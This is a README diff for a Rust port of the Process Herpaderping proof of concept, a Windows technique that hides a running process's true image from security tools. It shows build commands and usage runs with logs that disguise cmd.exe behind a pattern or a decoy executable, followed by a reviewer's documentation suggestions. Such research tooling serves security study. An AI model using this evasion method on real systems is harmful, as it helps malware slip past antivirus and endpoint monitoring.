    README.md
    1  -# rust-herpaderping
    2  -Rust implementation of the Process Herpaderping
     1 +# Rust Process Herpaderping
     2 +Rust implementation of the Process Herpaderping original PoC written by **@jxy-s**: https://github.com/jxy-s/herpaderping.
     3 + 
     4 +> **DISCLAIMER.** All information contained in this repository is provided for educational and research purposes only. The owner is not responsible for any illegal use of included code snippets.
     5 + 
     6 +## Build
     7 +```
     8 +PS C:\Users\secur30nly> cargo build --release
     9 + 
     10 +// OR
     11 + 
     12 +PS C:\Users\secur30nly> cargo build --release --features debug // debug mod enabled
     13 +```
     14 + 
     15 +## Usage
     16 +### Help menu
     17 + 
     18 +```
     19 +PS C:\Users\secur30nly> .\rust-herpaderping.exe --help
     20 +Usage: rust-herpaderping.exe <SOURCE_FILENAME> <TARGET_FILENAME> [COVER_FILENAME]
     21 + 
     22 +Arguments:
     23 + <SOURCE_FILENAME>
     24 + <TARGET_FILENAME>
     25 + [COVER_FILENAME]
     26 + 
     27 +Options:
     28 + -h, --help Print help
     29 + -V, --version Print version
     30 + 
     31 +```
     32 + 
     33 +### Process herpaderping without debug mode and replacing target file (filling with pattern)
     34 + 
     35 +```
     36 +PS C:\Users\secur30nly> .\rust-herpaderping-nodebug.exe "C:\Windows\System32\cmd.exe" "C:\temp\dummy_file.exe"
     37 +2023-06-06T10:18:03.033Z INFO [rust_herpaderping] Source File: C:\Windows\System32\cmd.exe
     38 +2023-06-06T10:18:03.034Z INFO [rust_herpaderping] Target File: C:\temp\dummy_file.exe
     39 +2023-06-06T10:18:03.034Z INFO [rust_herpaderping] Target file created, handles to source file and target file retrieved
     40 +2023-06-06T10:18:03.037Z INFO [rust_herpaderping] Source file written to target file
     41 +2023-06-06T10:18:03.038Z INFO [rust_herpaderping] Target process created
     42 +2023-06-06T10:18:03.038Z INFO [rust_herpaderping] Target file was replaced by pattern
     43 +2023-06-06T10:18:03.040Z INFO [rust_herpaderping] Main thread in target process started. Waiting until the process is finished
     44 +2023-06-06T10:18:15.322Z INFO [rust_herpaderping] Process herpaderping is over :D
     45 +```
     46 + 
     47 +### Process herpaderping with debug mode enabled
     48 + 
     49 +```
     50 +PS C:\Users\secur30nly> .\rust-herpaderping.exe "C:\Windows\System32\cmd.exe" "C:\temp\dummy_file.exe"
     51 +2023-06-06T10:19:30.079Z INFO [rust_herpaderping] Source File: C:\Windows\System32\cmd.exe
     52 +2023-06-06T10:19:30.079Z INFO [rust_herpaderping] Target File: C:\temp\dummy_file.exe
     53 +2023-06-06T10:19:30.079Z DEBUG [rust_herpaderping] Source file handle: 156
     54 +2023-06-06T10:19:30.079Z DEBUG [rust_herpaderping] Target file handle: 160
     55 +2023-06-06T10:19:30.079Z INFO [rust_herpaderping] Target file created, handles to source file and target file retrieved
     56 +2023-06-06T10:19:30.079Z DEBUG [rust_herpaderping] Source file size: 289792
     57 +2023-06-06T10:19:30.079Z DEBUG [rust_herpaderping] Target file size before writing: 0
     58 +2023-06-06T10:19:30.079Z DEBUG [rust_herpaderping] Content buffer size after reading source file: 289792
     59 +2023-06-06T10:19:30.080Z DEBUG [rust_herpaderping::utils] Bytes written to target: 289792
     60 +2023-06-06T10:19:30.080Z INFO [rust_herpaderping] Source file written to target file
     61 +2023-06-06T10:19:30.081Z DEBUG [rust_herpaderping] Section handler: 156
     62 +2023-06-06T10:19:30.081Z DEBUG [rust_herpaderping] Process handler: 164
     63 +2023-06-06T10:19:30.081Z INFO [rust_herpaderping] Target process created
     64 +2023-06-06T10:19:30.081Z DEBUG [rust_herpaderping::utils] Mapping handle: 156
     65 +2023-06-06T10:19:30.081Z DEBUG [rust_herpaderping::utils] Mapped view address: 0x20ec9590000
     66 +2023-06-06T10:19:30.081Z DEBUG [rust_herpaderping::utils] File mapping size: 290816
     67 +2023-06-06T10:19:30.081Z DEBUG [rust_herpaderping::utils] RVA of image entry point: 0x18f50
     68 +2023-06-06T10:19:30.082Z DEBUG [rust_herpaderping::utils] Bytes written to target: 289792
     69 +2023-06-06T10:19:30.082Z INFO [rust_herpaderping] Target file was replaced by pattern
     70 +2023-06-06T10:19:30.082Z DEBUG [rust_herpaderping] PEB base address: 0x307e451000
     71 +2023-06-06T10:19:30.082Z DEBUG [rust_herpaderping::utils] Parameters maximum length + size of environment: 6528
     72 +2023-06-06T10:19:30.082Z DEBUG [rust_herpaderping::utils] Allocated memory in remote process: 0x1bc62890000
     73 +2023-06-06T10:19:30.083Z DEBUG [rust_herpaderping::utils] Param env local address: 0x20ec93ce828
     74 +2023-06-06T10:19:30.083Z DEBUG [rust_herpaderping::utils] Param env remote address: 0x1bc62890708
     75 +2023-06-06T10:19:30.083Z DEBUG [rust_herpaderping::utils] Bytes of env written to remote address: 6528
     76 +2023-06-06T10:19:30.083Z DEBUG [rust_herpaderping::utils] Bytes written of param pointer to remote params: 8
     77 +2023-06-06T10:19:30.083Z DEBUG [rust_herpaderping] Remote entry point address: 0x7ff753258f50
     78 +2023-06-06T10:19:30.084Z DEBUG [rust_herpaderping] Started thread handle: 156
     79 +2023-06-06T10:19:30.085Z INFO [rust_herpaderping] Main thread in target process started. Waiting until the process is finished
     80 +2023-06-06T10:19:44.693Z INFO [rust_herpaderping] Process herpaderping is over :D
     81 +```
     82 + 
     83 +### Process herpaderping with replacing target file
     84 + 
     85 +```
     86 +PS C:\Users\secur30nly> .\rust-herpaderping-nodebug.exe "C:\Windows\System32\cmd.exe" "C:\temp\dummy_file.exe" "C:\Program Files\Process Hacker 2\ProcessHacker.exe"
     87 +2023-06-06T10:26:27.804Z INFO [rust_herpaderping] Source File: C:\Windows\System32\cmd.exe
     88 +2023-06-06T10:26:27.804Z INFO [rust_herpaderping] Target File: C:\temp\dummy_file.exe
     89 +2023-06-06T10:26:27.805Z INFO [rust_herpaderping] Target file created, handles to source file and target file retrieved
     90 +2023-06-06T10:26:27.806Z INFO [rust_herpaderping] Source file written to target file
     91 +2023-06-06T10:26:27.807Z INFO [rust_herpaderping] Target process created
     92 +2023-06-06T10:26:27.811Z INFO [rust_herpaderping] Target file was replaced by file: C:\Program Files\Process Hacker 2\ProcessHacker.exe
     93 +2023-06-06T10:26:27.812Z INFO [rust_herpaderping] Main thread in target process started. Waiting until the process is finished
     94 +2023-06-06T10:26:46.666Z INFO [rust_herpaderping] Process herpaderping is over :D
     95 +```
    3 96   
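Review bot: In the Build block, the second command has `// debug mod enabled` on the same line as `cargo build --release --features debug`. `//` is not a comment in PowerShell, so a reader who copies the line passes those words to cargo as extra arguments. Move that remark and the `// OR` line out of the fenced block into prose, and correct "mod" to "mode". Two related documentation gaps: the usage sections run `rust-herpaderping-nodebug.exe`, but the Build section never says how a binary with that name is produced, so state which build yields which executable. The heading "without debug mode and replacing target file (filling with pattern)" reads as if the target is not replaced, while its log shows "Target file was replaced by pattern"; reword it to say that when no COVER_FILENAME is given the target is filled with a pattern, and add a one-line description of each argument under the help output.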